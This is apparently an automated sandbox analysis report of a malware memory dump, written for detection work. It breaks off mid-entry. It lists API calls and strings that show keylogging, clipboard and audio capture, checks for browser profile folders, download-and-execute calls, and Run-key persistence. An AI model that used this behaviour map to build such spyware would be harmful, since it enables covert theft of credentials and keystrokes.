                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                  • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                  • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                  • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 3919263394-0
                                  • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                  • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                  • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                  • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                  APIs
                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleOpenProcess
                                  • String ID:
                                  • API String ID: 39102293-0
                                  • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                  • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                  • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                  • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                    • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                  • _UnwindNestedFrames.LIBCMT ref: 00439891
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                  • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                  • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                  • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                  APIs
                                  • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                  • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                  • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                  • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem
                                  • String ID:
                                  • API String ID: 4116985748-0
                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                  • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                  • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                    • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                  • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                  • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                  • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                  • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                  • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                  APIs
                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                  • __Init_thread_footer.LIBCMT ref: 0040B797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Init_thread_footer__onexit
                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                  • API String ID: 1881088180-3686566968
                                  • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                  • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                  • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                  • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                  APIs
                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ACP$OCP
                                  • API String ID: 0-711371036
                                  • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                  • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                  • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                  • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                  APIs
                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 481472006-1507639952
                                  • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                  • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                  • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                  • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                  APIs
                                  • Sleep.KERNEL32 ref: 00416640
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DownloadFileSleep
                                  • String ID: !D@
                                  • API String ID: 1931167962-604454484
                                  • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                  • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                  • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                  • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                  APIs
                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: | $%02i:%02i:%02i:%03i
                                  • API String ID: 481472006-2430845779
                                  • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                  • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                  • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                  • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: alarm.wav$hYG
                                  • API String ID: 1174141254-2782910960
                                  • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                  • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                  • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                  • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                  APIs
                                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                  • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                  • String ID: Online Keylogger Stopped
                                  • API String ID: 1623830855-1496645233
                                  • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                  • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                  • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                  • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                  APIs
                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$BufferHeaderPrepare
                                  • String ID: XMG
                                  • API String ID: 2315374483-813777761
                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                  APIs
                                  • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocaleValid
                                  • String ID: IsValidLocaleName$JD
                                  • API String ID: 1901932003-2234456777
                                  • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                  • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                  • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                  • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                  • API String ID: 1174141254-4188645398
                                  • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                  • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                  • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                  • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                  • API String ID: 1174141254-2800177040
                                  • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                  • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                  • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                  • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: AppData$\Opera Software\Opera Stable\
                                  • API String ID: 1174141254-1629609700
                                  • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                  • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                  • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                  • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                  APIs
                                  • GetKeyState.USER32(00000011), ref: 0040B64B
                                    • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                                    • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                    • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                  • String ID: [AltL]$[AltR]
                                  • API String ID: 2738857842-2658077756
                                  • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                  • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                  • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                  • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                  APIs
                                  • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                  • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: uD
                                  • API String ID: 0-2547262877
                                  • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                  • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                  • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                  • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell
                                  • String ID: !D@$open
                                  • API String ID: 587946157-1586967515
                                  • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                  • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                  • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                  • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                  APIs
                                  • GetKeyState.USER32(00000012), ref: 0040B6A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: State
                                  • String ID: [CtrlL]$[CtrlR]
                                  • API String ID: 1649606143-2446555240
                                  • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                  • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                  • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                  • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                  APIs
                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                  • __Init_thread_footer.LIBCMT ref: 00410F29
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Init_thread_footer__onexit
                                  • String ID: ,kG$0kG
                                  • API String ID: 1881088180-2015055088
                                  • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                  • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                  • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                  • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteOpenValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                  • API String ID: 2654517830-1051519024
                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                  • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                  • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                  APIs
                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteDirectoryFileRemove
                                  • String ID: pth_unenc
                                  • API String ID: 3325800564-4028850238
                                  • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                  • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                  • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                  • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                  APIs
                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  Strings
                                  Memory Dump Source
